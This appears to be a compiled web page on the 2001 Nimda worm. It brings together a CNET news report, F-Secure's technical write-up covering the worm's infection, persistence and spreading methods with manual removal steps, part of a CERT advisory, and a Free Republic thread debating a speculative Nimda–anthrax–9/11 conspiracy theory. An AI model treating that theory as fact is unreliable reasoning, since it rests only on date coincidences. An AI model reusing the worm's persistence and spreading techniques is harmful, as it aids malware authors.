WebCrime

NIMDA

Home
THE PROFIT MOTIVE: MyDoom Redux:
MALICIOUS CODE
HORROR STORIES
SPYWARE
SPOOFING
ANTHRAX
VIRUSES BY OTHER NAMES
PROGRAMMING VIA BIOLOGICAL ENGINEERING TECHNIQUES
MYDOOM
WORMS
KEYLOGGER
SPYWARE
HYBRIDS
ANTHRAX ON THE INTERNET
ANTHRAX CHATTER
CELLPHONE VIRUS CHATTER
VIRUS CHATTER
ANTHRAX CHATTER
MICROSOFT CHATTER
"link=bacillus"
MSBLASTER
PHISHING
SWEN
FIREWALLS
TERMS GLOSSARY
MALICIOUS SCRIPTS: THE STATE OF THE ART DELIVERY METHOD
RESOURCES: FIGHTING BACK - FREE UTILITIES
CODE RED
WHAT'S IN A NAME
MICROSOFT
NIMDA
ANTHRAX-NIMDA CONNECTION
SCRIPT KIDDIES VRS ENGINEERS
THE UNLIKELY LADDS
VIRUS ALLERTS
IDENTITY THEFT
HEADS OFF
HEADSUP

 
"No evidence" of terrorist link " Zdat so?
 

"Nimda" worm strikes Net, e-mail

Published: September 18, 2001, 5:20 PM PDT
By Robert Lemos
Staff Writer
 

update A computer worm that spreads to both servers and PCs running Microsoft software flooded the Internet with data Tuesday, prompting the FBI to create a task force to investigate the attack, sources said.

see special report: Year of the Worm Known as "Nimda" or "readme.exe," the worm spreads by sending infected e-mail messages, copying itself to computers on the same network, and compromising Web servers using Microsoft's Internet Information Server (IIS) software.

"It is extraordinary how much traffic this thing has created in a couple of hours," said Graham Cluley, senior security consultant for antivirus company Sophos. "As far as we can see, it doesn't seem to be using any psychological tricks because it's all automated."

Mailing lists for the security community quickly generated news of the worm, as infected servers scanned the Internet for vulnerable servers.

Sources in the antivirus community told CNET News.com that the FBI has set up a "task force" to study the virus. The FBI held conference calls three times Tuesday night with antivirus experts to discuss the investigation, sources said.

"There was a task force set up today, and there were a lot of things discussed," said Vincent Gullotto, director of antivirus research at security software firm Network Associates.

"No evidence" of terrorist link
An FBI representative said the agency was "assessing" the incident, but so far it found no relationship between the online deluge and last week's terrorist attacks on the World Trade Center and the Pentagon.

"There has been no indication that this is linked (to Tuesday's) attack," said FBI spokeswoman Debbie Weierman. "That is the question of the day."

At a news conference Tuesday about last week's terrorist attacks, Attorney General John Ashcroft also spoke about the Internet worm. "This could be heavier than the July activity with Code Red," he said.

He noted that there is "no evidence" linking the worm, which he said may have first appeared on Monday, "to the terrorist attacks of last week."

How the worm infects The worm was noticed by several Silicon Valley companies.

"It does appear to be more aggressive than Code Red," said spokeswoman Pamela Sklar of network equipment maker 3Com. She added that the company's IT department received more hits per hour from Nimda than it did from Code Red, but that there was no direct effect on e-mail or Internet access.

The worm's name sparked speculation about its origin. Nimda, for example, is the backward spelling of admin, the common shorthand for the system administrator. While the worm has text indicating that it may have originated in China, that is in no way hard evidence, experts said.

Others pointed out that NIMDA is the name of an Israeli defense contractor.

The worm apparently generates an avalanche of Internet traffic because of its multipronged attack on both servers and PCs.

The server component of the virus exploits an old and previously patched flaw in IIS called the Unicode Directory Traversal vulnerability.

Once a server is infected, the worm continues to scan for other vulnerable computers. In addition, the program takes control of the part of Microsoft's IIS software that delivers Web pages, Worldwide Web response times chart allowing the virus to trump a request for any page--even invalid requests--and instead return a page infected with the virus.

In addition to its ability to cross between servers and PCs, the Nimda worm seems to be more virulent because it automatically executes in Microsoft's Outlook e-mail software under the program's "low" security setting.

"There appears to be a MIME exploit," said Eric Chien, chief researcher for antivirus software maker Symantec's European operations. "It appears that it is doing some kind of exploitation in e-mail."

Nimda also appears to be capable of spreading by other means, including Internet relay chat (IRC), an online chat format, and by FTP for remotely exchanging files.

"My guess is we may also see it spread through Internet relay chat," said Alex Shipp, senior antivirus technologist at e-mail screening firm MessageLabs.

And that may not be the end of it. "We have also found an FTP component in there," Shipp said. "It may be trying to download nasty stuff from some Web site somewhere--we're still not sure. We know it is using FTP, but we don't know how yet."


CNET Networks' Rob Lemos explains that Nimda uses components of two earlier worms. (5:35)

Play clip

Attorney General John Ashcroft cannot connect new virus to terrorist attacks (1:27)

Play clip

MessageLabs said it stopped more than a hundred copies of the virus attached to e-mail messages within an hour of the first incident, which arrived from Korea at 12:10 p.m. GMT.

Most of the Nimda copies captured by MessageLabs originated from the United States, leading the company to speculate that was where the virus originated.

While thousands of people likely became aware of the worm when their in-boxes were flooded with e-mail, for some the damage was more severe.

Mel Lower of Davenport, Iowa, who hosts Web sites for small businesses through EarthLink, said two of his customers' sites were inaccessible for much of Tuesday.

Lower said he contacted EarthLink and was told that the worm "crippled" two Unix server farms. EarthLink could not immediately be reached for comment.

When Nimda arrives in an e-mail, it appears as an attachment named readme.exe. This is the same name used by another current virus called W32/Apost-A, so antivirus companies say many people should already be wary of attachments bearing that name.

However, analysis of the worm is ongoing, experts said.

"First of all, we are talking guesses at this time," said Fred Cohen from the University of New Haven in Connecticut. "Clearly, (it) just showed up this morning."

For some time Tuesday morning, the worm's double whammy had experts believing that two pieces of code were spreading at the same time.

The Computer Emergency Response Team

 Staff writer Matt Loney contributed from London.

 
 
 
F-Secure Logo - Be Sure                         Spam Control

Japanese

Products
Virus Info
How to Buy
Downloads
Support
News
About Us
Partners

F-Secure Virus Descriptions : Nimda





NAME: Nimda
ALIAS: W32/Nimda.A@mm
ALIAS: W32/Nimda@mm, I-Worm.Nimda, Readme, Readme.exe
SIZE: 57344

INFORMATION ON NIMDA

This worm was found on September 18th, 2001. It quickly spread around the world.

Also see http://www.F-Secure.com/news/2001/news_2001091900.shtml

F-Secure Anti-Virus detects the worm with updates released on September 18th, 2001 19:20 EET. Disinfection was added in the updates from September 19th, 2001 17:12 EET.

http://www.europe.f-secure.com/download-purchase/updates.shtml

For removal instructions, see the bottom of the page.

GENERAL INFORMATION

Nimda is a complex virus with a mass mailing worm component which spreads itself in attachments named README.EXE. If affects Windows 95, Windows 98, Windows Me, Windows NT 4 and Windows 2000 users.

Nimda is the first worm to modify existing web sites to start offering infected files for download. Also it is the first worm to use normal end user machines to scan for vulnerable web sites. This technique enables Nimda to easily reach intranet web sites located behind firewalls - something worms such as Code Red couldn't directly do.

Nimda uses the Unicode exploit to infect IIS web servers. This hole can be closed with a Microsoft patch, downloadable from: http://www.microsoft.com/technet/security/bulletin/ms00-078.asp

The MIME exploit used by the worm can be fixed with this patch: http://www.microsoft.com/technet/security/bulletin/MS01-020.asp

LIFECYCLE

The actual lifecycle of Nimda can be split to four parts: 1) Infecting files, 2) Mass mailing, 3) Web worm and 4) LAN propagation.

1) File infection

Nimda locates EXE files from the local machine and infects them by putting the file inside its body as a resource, thus 'assimilating' that file.These files then spread the infection when people exchange programs such as games.

2) Mass mailer

Nimda locates e-mail addresses via MAPI from your e-mail client as well as searching local HTML files for additional addresses. Then it sends one e-mail to each address. These mails contain an attachment called README.EXE, which might be executed automatically on some systems.

3) Web worm

Nimda starts to scan the internet, trying to locate www servers. Once a web server is found, the worm tries to infect it by using several known security holes. If this succeeds, the worm will modify random web pages on the site. End result of this modification is that web surfers browsing the site will get automatically infected by the worm.

4) LAN propagation

The worm will search for file shares in the local network, either from file servers or from end user machines. Once found, it will drop a hidden file called RICHED20.DLL to any directory which has DOC and EML files. When other users try to open DOC or EML files from these directories, Word, Wordpad or Outlook will execute RICHED20.DLL causing an infection of the PC. The worm will also infect remote files if it was started on a server.

TECHNICAL DETAILS

First it should be noted that the worm behaves differently when started from files with different file names and with different command lines.

Starting on a server:

If the name of worm's file is ADMIN.DLL, the worm creates a mutex with 'fsdhqherwqi2001' name, copies itself as MMC.EXE into \Windows\ directory and starts this file with '-qusery9bnow' command line. Usually the worm is started as ADMIN.DLL on infected webservers. In this case the worm starts to scan and infect files on all available drives including removable and network ones. The EXE files (except WINZIP32.EXE) on these drives will get infected with the worm. The infection technique the worm uses is new - the worm puts an infected file inside its body as a resource. When the infected file is run, the worm extracts the embedded original EXE file, runs it and tries to delete it afterwards. If instant deletion is not possible, the worm creates WININIT.INI file that will delete the extracted file on next Windows startup.

The worm also accesses [SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths] key reads subkeys from there and infects all files listed in the subkeys. The worm doesn't infect WinZip32.exe file. Also the worm reads user's personal folders from [Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders] key and infects files in these folders as well.

Then the worm starts to search local hard drives for *.HTML, .ASP, and .HTM files and if such files are found, the worm creates README.EML file (which is the multi-partite message with MIME-encoded worm) in the same directory and adds a small JavaScript code to the end of found files. That JavaScript code would open README.EML file when the infected HTML file is loaded by a web browser. As a result the MIME-encoded worm will get activated because of a security hole and a system will get infected.

The worm's file runs from a minimized window when downloaded from an infected webserver. This technique affects users who are browsing the web with Internet Explorer 5.0 or 5.01.

The worm will also put *.EML and *.NWS files in almost all folders of computers it accesses. The RICHED20.DLL file with hidden and system attribute will be put in all folders where DOC or EML files are located. The worm will also try to replace Windows' original RICHED20.DLL file with its own copy.

Starting on a workstation:

If the worm is started from README.EXE file (or a file that has more than 5 symbols in its name and EXE extension), it copies itself to temporary folder with a random name that has 'MEP*.TMP' name and runs itself there with '-dontrunold' command line option.

When started, the worm loads itself as a DLL library, looks for a specific resource there and checks its size. If the resource size is less than 100, the worm unloads itself, otherwise it extracts its resource to a file and launches it. Checking the resource size is done to be able to detect if a worm runs from infected EXE files.

Then the worm gets current time and generates a random number. After performing a few arithmetic operations with this number the worm checks the result. If a result is bigger than worm's counter, the worm starts to search and delete README*.EXE files from temporary folder.

After that the worm prepares its MIME-encoded copy by extrating a pre-defined multi-partite MIME message from its body and appending its MIME-encoded copy to it. The file with a random name is created in a temporary folder.

The worm then looks for EXPLORER process, opens it and assigns its process as remote thread of Explorer. On some platforms the worm fails to run as Explorer's thread. The worm gets API creates a mutex with 'fsdhqherwqi2001' name, startups Winsock services, gets an infected computer (host) info and sleeps for some time. When resumed, the worm checks what platform it is running. If it is running on NT-based system, it compacts its memory blocks to occupy less space in memory and copies itself as LOAD.EXE to Windows system directory. Then it modifies SYSTEM.INI file by adding the following string after SHELL= variable in [Boot] section:

  explorer.exe load.exe -dontrunold
                                    

This will start the worm's copy every time Windows starts. The worm also copies itself as RICHED20.DLL file to system folder and sets hidden and system attributes to this file as well as to LOAD.EXE file. Then the worm enumerates shared network resources and starts to recursively scan files on remote systems.

When searching for files on remote systems the worm looks for .DOC and .EML files and then copies its binary image with RICHED20.DLL name to the folders where DOC and EML files are located. The copied DLL file has system and hidden attributes. This is done to increase the chances of worm activation on remote systems as Windows' original RICHED20.DLL component is used to open OLE files. But instead the worm's RICHED20.DLL file from current directory will be launched.

Also when the worm browsing the remote computers' directories it creates .EML and .NWS (rarely) files that have the names of document or webpage files that the worm could find on a remote system. These .EML and .NWS files are worm's multi-partite messages with a worm MIME-encoded in them. When scanning the worm can also delete the .EML and .NWS files it previously created.

The worm doesn't try to infect local or remote EXE files when started from a workstation.

E-Mail spreading:

The worm searches trough all the '.htm' and '.html' file in the Temporary Internet Files folder for e-mail addresses. It reads trough user's inbox and collects the sender addresses. When the address list is ready it uses it's own SMTP engine to send the infected messages.

IIS spreading:

The worm uses backdoors on IIS servers such as the one CodeRed II installs. It scans random IP addresses for these backdoors. When a host is found to have one the worm instructs the machine to download the worm code (Admin.dll) from the host used for scanning. After this it executes the worm on the target machine this way infecting it.

Affecting the security:

The worm adjusts the properties of Windows Explorer, it accesses [Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced] key and adjusts 'Hidden', 'ShowSuperHidden' and 'HideFileExt' keys. This affects Windows' (especially ME and 2000) ability to show hidden files - worm's files will not be seen in Explorer any more.

After that the worm adds a 'guest' account to infected system account list, activates this account, adds it to 'Administrator' and 'Guests' groups and shares C:\ drive with full access priviledges. The worm also deletes all subkeys from [SYSTEM\CurrentControlSet\Services\lanmanserver\Shares\Security] key to disable sharing security.

Additional information:

The worm has a copyright text string that is never displayed:

 Concept Virus(CV) V.5, Copyright(C)2001  R.P.China
                                    

It should be said that the worm has bugs that cause crashes or inability to spread itself in certain conditions.

DISINFECTION INSTRUCTIONS

F-Secure Anti-Virus with the latest updates can detect and disinfect Nimda infections. But full disinfection of the worm will require some additional manual actions.

The F-NIMDA tool was developed to automate these actions. If you wish to do them by hand, follow the instructions below. Otherwise, download F-NIMDA from

ftp://ftp.f-secure.com/anti-virus/tools/fsnimda3.exe

If you're running Windows ME, you need to turn off the Autorestore functionality before starting any disinfection. Do this by clicking My Computer on desktop, then Performance->File System ->Troubleshooting->Disable System Restore. Turn it back on when done.

To disinfect the worm and restore security of affected workstations, please follow these instructions:

1. Disable all network sharing or temporarily kill the network. This is a _must_ as the worm uses the network to spread itself.

2. Scan _all_ files (not just files with selected extensions) on all local hard drives and clean all infected EXE files using F-Secure Anti-Virus and the latest updates. It is recommended that you use one of the latest FSAV versions to remove infection.

3. Delete or rename (if not possible to delete instantly) all non-disinfectable or locked files including worm droppers (typically 57kB in size):

  MMC.EXE (in Windows directory)
                                      LOAD.EXE (in Windows' system directory)
                                      ADMIN.DLL (in root folder of all local hard drives)
                                      RICHED20.DLL (in all folders on all local hard drives)
                                    

  All *.EML and *.NWS files (typically 79kB in size) that are
                                      detected as infected with Nimda should be deleted. Note that
                                      you might have clean EML files as well, for example if you've
                                      saved e-mails to file from Outlook Express, so only delete
                                      files that FSAV detects as infected.
                                    

If an infected file is locked by Windows, complete disinfection, exit to pure DOS or boot your system with a clean system diskette and rename/delete the file manually. In case of NT/2000 based system the locked file(s) should be renamed with a non-executable extension to ensure that it doesn't start when Windows is booted next time.

4. Restart a system. Do not connect it to the network yet. It is advised to scan all files on all local drives with FSAV again to ensure that there are no more infected files in a system.

5. Locate SYSTEM.INI file in your Windows directory and open it with Wordpad or Notepad. Replace the string "shell=explorer.exe load.exe -donotloadold" with "shell=explorer.exe" string.

6. Delete all files with .TMP extensions from your local temporary directories - typically \Temp\ or \Windows\Temp\ or \documents and settings\username\local settings\temp.

7. Copy a clean RICHED20.DLL file to \Windows\System\ or \WinNT\System32\ folders. This DLL file is used by many applications and they won't run if this DLL is missing. You can locate a clean RICHED20.DLL file from a clean Windows machine, or extract it from Office 2000 CD with this command:

   EXTRACT /A r:\office1.cab riched20.dll /L c:\windows\system
                                    

8. Remove all shares from all local hard drives and renew these shares with correct access rights if needed. This needs to be done because the worm affects shares security. Check especially the \\localhost\c$ share rights.

9. Remove 'Guest' account and renew it with correct access rights and group placement ('Guest' account should not be in 'Administrators' group).

10. Check all *.HTML, *.ASP, and *.HTM as well as files that have 'DEFAULT', 'INDEX', 'MAIN' and 'README' words in their filenames for the small JavaScript code referring to README.EML file and remove it or restore the affected files from a backup. This JavaScript code is located in the very end of affected files.

11. When cleaning a webserver from Nimda, the CodeRed II backdoor infections should be removed as well. Please refer to 'CodeRed' description and cleaning instructions.

http://www.europe.f-secure.com/v-descs/bady.shtml

12. Correct Windows Explorer's settings concerning displaying of hidden files and certain extensions if necessary as the worm makes Explorer to hide certain files and extensions.

13. Restore network connections only after all workstations are disinfected or the worm will re-infected already clean computers!

ABOUT INFECTED WEB SITES

A web site can get infected in two ways:

1) Infected htmls are copied the secure site. This can happen even if you're using a patched version of IIS or something else entirely (such as Apache or Netscape). If there are infected computers in your organization, their local html files get infected. Users might then later copy or upload such infected pages to your www server. Alternatively, if your www files are accessible via file sharing the worm might infect them directly from a workstation. To clean your site, locate all html pages which refer to "README.EML" and remove the extra Javascript code from the end of the pages.

2) Direct web worm infection. If your web site is running an unsafe version of IIS, the worm can infect your site by accessing it through http. After this it will restart spreading from your server. In this case, it is not enough to just clean the virus - your web server is unsafe and has been so for a while. It's likely there have been previous illegimate accesses to your site as well and it should be considered compromised. We recommend rebuilding the web server and applying latest patches before restoring clean copies of the html pages.

Remember, F-Secure Management Server 4.x uses IIS as a web server platform. Keep them patched. F-Secure Policy Manager Server 5.0 and higher do NOT use IIS.

IMPORTANT NOTE

Around 15:00 GMT on 11th of October, 2001, hundreds of e-mails infected with Nimda.A was sent to various addresses around the world. These e-mails looked like they were sent by "mikko.hypponen@datafellows.com" (do note that F-Secure used to be called datafellows.com; company name and domain was changed in early 2000). Mr. Mikko Hypponen is our Manager of Anti-Virus Research. He naturally had nothing to do with this incident. These e-mails were apparently sent from an infected machine located somewhere in Canada.

F-SECURE ANTI-VIRUS

F-Secure Anti-Virus detects the worm with updates released on September 18th, 2001 19:20 EET. Disinfection was added in the updates from September 19th, 2001 17:12 EET.

http://www.europe.f-secure.com/download-purchase/updates.shtml

[Analysis: K. Tocheva, G. Erdelyi, A. Podrezov, S. Rautiainen and M. Hypponen; F-Secure Corp.; September 18-19th, 2001]

 
 
 

Skip to comments.

Possible break in the anthrax case? (Actual title: Anthrax-Nimda Connection)
Dept. of Computer Science and Software Engineering, Seattle University ^ | November 9, 2001 | M. Spector

Posted on 11/13/2001 12:42:52 PM PST by Mitchell

ANTHRAX-NIMDA CONNECTION

Two Prongs of One Attack on Our Communication System

M. Spector
Dept. of Computer Science and Software Engineering
Seattle University
E-mail: spector@seattleu.edu

November 9, 2001

It appears likely that the recent anthrax mailings and the Nimda computer worm are two prongs of a single coordinated attack on our communications infrastructure. If this theory is correct, there may be two undiscovered anthrax-laden letters, including one mailed in late October whose victims would still be in the incubation period.

A Summary of the Evidence

The anthrax mailings and the Nimda worm were released on exactly the same two dates. Moreover, they were distributed via essentially the same method, and they shared a common apparent purpose. The details follow.

Released on the Same Dates
The anthrax-laden letters were postmarked on Sept. 18 and Oct. 9, 2001. These are precisely the same dates that the destructive Nimda worm and a new variant of this worm called Nimda.B were released on the Internet. Sept. 18 was the date that the Nimda worm was released on the Internet, and Oct. 9 was the date that the Nimda.B variant was released.

Same Method
Both involve mailing (either by the Postal Service or by e-mail) a destructive payload to unsuspecting individuals. Although the two attacks (anthrax and Nimda) appear at first glance to be very different from one another, a similar mind-set seems to underlie both.

Same Apparent Purpose
Both attacks may have had as their combined purpose the simultaneous disruption of all our mail communications -- both the U.S. mail and e-mail. Luckily, neither attack has been particularly successful in this regard, at least so far.

In addition, the anthrax letters were sent to people in the mass media, which is another component of our communications system.

Consequences

Still-Undiscovered Anthrax Mailings? (Kathy Nguyen's Death and Another Possible Forthcoming Attack)
Three more variants of the Nimda worm were released after Nimda.B: Nimda.C (on October 12), and Nimda.D and Nimda.E (both on October 29). If the anthrax-Nimda connection isn't a coincidence, there may have been further mailings of anthrax on October 12 and October 29.

Are there undiscovered anthrax letters that were mailed on the later worm release dates of October 12 and October 29? Is it conceivable that a hypothetical October 12 mailing was responsible for Kathy Nguyen's death? I think anybody infected by a hypothetical October 29 mailing would still be in the incubation period for the disease, with signs of infection to show up shortly.

I hope I'm wrong about the possibility of an Oct. 29 anthrax mailing, but it's important to be alert for more anthrax cases as we near the end of what would be the incubation period (and this is also a test of whether the theory is correct).

Notice that these hypothetical anthrax release dates are consistent with the warnings of terrorist attacks within the following few days issued by the FBI on Oct. 11 and by Attorney General John Ashcroft on Oct. 31 (especially in light of both the incubation period for anthrax and the inherent uncertainty in warnings such as these).

Connection with Code Red II and earlier worms
The Nimda worm makes use of "back-doors" left by the earlier Code Red II and sadmind worms. It is unknown if this is an opportunistic use of these back-doors, or if one or both of these earlier worms were released with the specific intent of following up with the Nimda worm. It is also unknown if Code Red II is actually related to the original Code Red worm (in spite of the names assigned by security experts). In any event, the sadmind worm was released on May 8, 2001, Code Red was released on July 16, 2001, and Code Red II was released on August 4, 2001. It would be of interest to see if there were any apparently unrelated anthrax threats, terrorist threats, etc., on May 8, July 16, and/or August 4. (I have seen a news report indicating that Bill O'Reilly and Sean Hannity of Fox News may have received letters before Sept. 11 apparently similar to the later anthrax mailings.)

The People Behind the Attack
The coincidence of dates and the similarity of methods and purpose indicate that the same group of people is behind both the anthrax attacks and the Nimda series of worms. It appears that at least two people must be involved, since one person is unlikely to be so skilled at both microbiology and software development as to have been able to create and carry out both attacks.

Speculation

Speculation - Connections with the 9/11 attacks
The first Nimda attack occurred almost precisely one week (to the hour, and maybe to the minute) after the first plane hit the World Trade Center, strongly suggesting a connection between the Sept. 11 attacks and Nimda, and now therefore suggesting a connection between the Sept. 11 attacks and the anthrax mailings.

Speculation - Place of Origin
This theory may point to a foreign connection with the anthrax attack. It has been widely suggested that Nimda may have originated in China; this is purely speculative and is based only on early widespread propagation in Asia and on the fact the worm itself contains a reference to China.

Background: Technical Information on the Nimda Worm (and others)

For technical information on the Nimda, Code Red, Code Red II, and sadmind worms, see the Symantec security web site at http://securityresponse.symantec.com , the F-Secure web site at http://www.europe.f-secure.com/v-descs/w.shtml (click on W32/Nimda.a@mm, etc.), and the SANS Institute web site at http://www.incidents.org .


TOPICS: Breaking News; News/Current Events
KEYWORDS: ANTHRAXSCARELIST; TECHINDEX

1 posted on 11/13/2001 12:42:52 PM PST by Mitchell

To: Mitchell
I only skimmed, but this is pretty fascinating. I'll be interested to see other comments.
2 posted on 11/13/2001 12:48:37 PM PST by NYS_Eric

To: Mitchell; *tech_index; *Anthrax_Scare_List
Very interesting !

To find all articles tagged or indexed using above index words

Go here:

OFFICIAL BUMP(TOPIC)LIST

and then click the topic to initiate the search! !

3 posted on 11/13/2001 12:48:51 PM PST by Ernest_at_the_Beach

To: Mitchell; *tech_index
Filing at tech_index
4 posted on 11/13/2001 12:52:21 PM PST by afraidfortherepublic

To: Mitchell
Bumpin' to check later.

Initial impression - it seems rather far-fetched, but, then again, that's an impressive set of 'coincidences'.

5 posted on 11/13/2001 12:57:55 PM PST by Le-Roy

To: Mitchell
Now THIS is getting really far fetched ....

Sorry, but the "evidence" is not only weak, it is outright MISSING! try again...

6 posted on 11/13/2001 1:00:37 PM PST by AgThorn

To: Mitchell
Speculation - Connections with the 9/11 attacks.

Ahhh.... He admits this is speculation.
7 posted on 11/13/2001 1:32:57 PM PST by self_evident

To: AgThorn
>Sorry, but the "evidence" is not only weak, it is outright MISSING! try again...

"Evidence?"

If the sequence of events as speculated about turns out to be true, what kind of evidence would be available?!

Would you dismiss a connection as unreal until an FBI agent just happens to walk into a two bedroom apartment where, in one bedroom, a guy is mixing up anthrax and in the other a guy is typing up computer code?

I mean, this is 2001. People doing this kind of terrorism aren't idiots. This weird, constant talk of "evidence" has an air of insanity to it.

More likely than not, there will NEVER be evidence that will stand up in a court of law EXPLAINING everything nice and tidy. But so what? Law enforcement or intelligent agencies still have to respond sooner rather than later to this kind of large scale threats. They have to act on something other than "court room evidence." And if we're going to understand what's going on around us, we have to recognize that although "evidence" is great and although it's dangerous to speculate without hard, material evidence, there are many situations where people just have to get creative, people have to trust their judgement, and people have to deal with conclusions based on them being persuasively true rather than true beyond a shadow of a doubt.

Reality is not a court room. It's just not. There is a kind of insanity in trying to deny all of reality that doesn't meet those utterly artificial standards.

Mark W.

8 posted on 11/13/2001 1:46:38 PM PST by MarkWar

To: MarkWar
What is the connection? the same date? that's it? That's pretty weak.
9 posted on 11/13/2001 1:54:37 PM PST by AgThorn

To: AgThorn
Two identical dates, plus similarity of method and purpose. How much more evidence could there be at this stage? It merits further investigation.

By the way, the CDC now thinks there is an undiscovered letter, mailed before Oct. 24. This could be the hypothesized Oct. 12 letter in the article. http://www.freerepublic.com/focus/fr/570240/posts

10 posted on 11/13/2001 2:01:19 PM PST by Mitchell

To: AgThorn
Sorry, but the "evidence" is not only weak, it is outright MISSING

This guy is so far out of his tree that it's pitiful. You see this phenomenon every time something happens on the malware front: a zillion wannabes popping up with one theory more bizarre than the next. Simply put, he's wrong. And if he had bothered to contact any of the people who knows about this stuff, he would know that he was wrong. That would probably not have deterred him from trying for some spotlight, though.

The author of Nimda is out there giving interviews and shouting for fame. Much like this dweeb.

11 posted on 11/13/2001 2:07:32 PM PST by Cachelot

To: Mitchell; AgThorn
Sorry for the extra URL at the end (a copy-and-paste error). It's the same as the CDC link at the beginning of that paragraph.
12 posted on 11/13/2001 2:11:11 PM PST by Mitchell

To: Cachelot
The author of Nimda is out there giving interviews and shouting for fame.

Interviews? Can you give a source for this? I've seen nothing on it.

13 posted on 11/13/2001 2:12:58 PM PST by Mitchell

To: Mitchell
Two identical dates, plus similarity of method and purpose. How much more evidence could there be at this stage? It merits further investigation.
similarity of method, i.e. meaning they are both "mail" (snail and "e") ... Yes, and ???? Does that mean that anyone that ever drove a truck has something in common with anyone else that drove a truck? especially if they did it on the same day? ... these "connections" are weaker than weak!!

Purpose?-That's redundant to "method" ... i.e. if your purpose is to get information channels blocked, you would in effect use the information channel to do the blocking. No, this is a great model for conspiracy chasers only.

Date- I have already stated that the ONLY thing going here is the similarity of dates ... but what is that? nothing.

SANTA and SATAN have the same letters, just rearranged ... heck that's got as much "conspiracy" grounding in it as this does.

14 posted on 11/13/2001 3:17:46 PM PST by AgThorn

To: AgThorn
SANTA and SATAN have the same letters, just rearranged...

This explains some of Christmas presents I've gotten lately....
15 posted on 11/13/2001 3:31:46 PM PST by self_evident

To: self_evident
I can relate!! ;-)
16 posted on 11/13/2001 5:29:22 PM PST by AgThorn

To: AgThorn
Silly speculation is fodder for mockery --except for the speculation that turns out to be true.

Who would have thought that there were Japanese spying all over numerous countries in the late 30's and early 40's, collaborating with Nazi's to boot --including a certain chap who lived for awhile in Pearl Harbor and liked to watch the ships move in and out of port?

17 posted on 11/13/2001 10:35:38 PM PST by unspun

To: unspun
Silly speculation is fodder for mockery --except for the speculation that turns out to be true.
You got a point there. Santa could after all be Satan, and remember, you read it here first!
18 posted on 11/13/2001 10:39:05 PM PST by AgThorn

To: AgThorn
Well, I'm not interested in getting into an argument over this. I find the coincidences intriguing, you don't; that's OK.

Unlike the run-of-the-mill conspiracy theory, this ones has testable conclusions; it's falsifiable. If it's correct, there ought to have been anthrax mailings postmarked very close to Oct. 12 and Oct. 29. (Even if such mailings turn up, I would agree that that's not definitive proof. If no such mailings turn up, however, that would be a strong argument against the theory.)

By the way, the similarity of method is much more than the fact that both used mail. Both involve using mail to send unrelated destructive payloads to unsuspecting people. (This may still not be enough to satisfy your standards for a connection, but it is more of a connection than your characterization suggests.)

Also, the similarity of purpose isn't the same as that of method. People have suggested lots of other possible rationales behind the anthrax attack (a warning from Iraq, for instance, or bin Laden aiming at the media to elicit maximum hysteria as he tries to goad us into an attack on all of the Muslim world, or possibly a test of how a biological agent would spread in the mail, or other possibilities). If this connection is true, it suggests a particular specific purpose, namely trying to disrupt or even shut down our mail and other communication systems.

Anyway, since the theory has testable conclusions, I thought it would be of interest to get it out there now, rather than after any further mailings are discovered (since at that time, people might say that the theory was tailored to fit the facts). Time will tell if it is true or false.

19 posted on 11/16/2001 1:06:33 PM PST by Mitchell

To: Mitchell
Time will tell if it is true or false.

I conceed that for certain. I still see stronger "ties" to Afghanistan/Iraq possible collusion in this than to any Nimda connection. Then again, who's to say that Nimda doesn't have Middle-east ties as well.

There is just too little even circumstantial evidence to make any other correlation at this time. Although we can always speculate ...

20 posted on 11/16/2001 1:07:08 PM PST by AgThorn

Comment #21 Removed by Moderator

To: AgThorn
I still see stronger "ties" to Afghanistan/Iraq possible collusion in this than to any Nimda connection. Then again, who's to say that Nimda doesn't have Middle-east ties as well.

I agree completely. I'll be quite surprised if the anthrax mailings turn out to be unconnected to the 9/11 attacks and probably Iraq.

22 posted on 11/16/2001 1:07:24 PM PST by Mitchell

To: bologna.com
You knew Eceshe in high school as well?

And she told ME I was the only one!!!

23 posted on 11/16/2001 1:09:57 PM PST by AgThorn

To: Mitchell
I agree completely. I'll be quite surprised if the anthrax mailings turn out to be unconnected to the 9/11 attacks and probably Iraq.
Careful with the quick agreement ... someone will be sizing ME up for a tinfoil hat soon!! ;-)
24 posted on 11/16/2001 1:10:37 PM PST by AgThorn

Comment #25 Removed by Moderator

Disclaimer: Opinions posted on Free Republic are those of the individual posters and do not necessarily represent the opinion of Free Republic or its management. All materials posted herein are protected by copyright law and the exemption for fair use of copyrighted works.


FreeRepublic, LLC, PO BOX 9771, FRESNO, CA 93794
FreeRepublic.com is powered by software copyright 2000-2003 Robinson-DeFehr Consulting, LLC.

Original release date: September 18, 2001
Revised: September 25, 2001
Source: CERT/CC

A complete revision history is at the end of this file.

Systems Affected

  • Systems running Microsoft Windows 95, 98, ME, NT, and 2000

Overview

The CERT/CC has received reports of new malicious code known as the "W32/Nimda worm" or the "Concept Virus (CV) v.5." This new worm appears to spread by multiple mechanisms:

The worm modifies web documents (e.g., .htm, .html, and .asp files) and certain executable files found on the systems it infects, and creates numerous copies of itself under various file names.

We have also received reports of denial of service as a result of network scanning and email propagation.

I. Description

The Nimda worm has the potential to affect both user workstations (clients) running Windows 95, 98, ME, NT, or 2000 and servers running Windows NT and 2000.

Email Propagation

This worm propagates through email arriving as a MIME "multipart/alternative" message consisting of two sections. The first section is defined as MIME type "text/html", but it contains no text, so the email appears to have no content. The second section is defined as MIME type "audio/x-wav", but it contains a base64-encoded attachment named "readme.exe", which is a binary executable.

Due to a vulnerability described in CA-2001-06 (Automatic Execution of Embedded MIME Types), any mail software running on an x86 platform that uses Microsoft Internet Explorer 5.5 SP1 or earlier (except IE 5.01 SP2) to render the HTML mail automatically runs the enclosed attachment and, as result, infects the machine with the worm. Thus, in vulnerable configurations, the worm payload will automatically be triggered by simply opening (or previewing) this mail message. As an executable binary, the payload can also be triggered by simply running the attachment.

The email message delivering the Nimda worm appears to also have the following characteristics:

  • The text in the subject line of the mail message appears to be variable.

  • There appear to be many slight variations in the attached binary file, causing the MD5 checksum to be different when one compares different attachments from different email messages. However, the file length of the attachment appears to consistently be 57344 bytes.

The worm also contains code that will attempt to resend the infected email messages every 10 days.

Payload

The email addresses targeted for receiving the worm are harvested from two sources

  • the .htm and .html files in the user's web cache folder
  • the contents of the user's email messages retrieved via the MAPI service

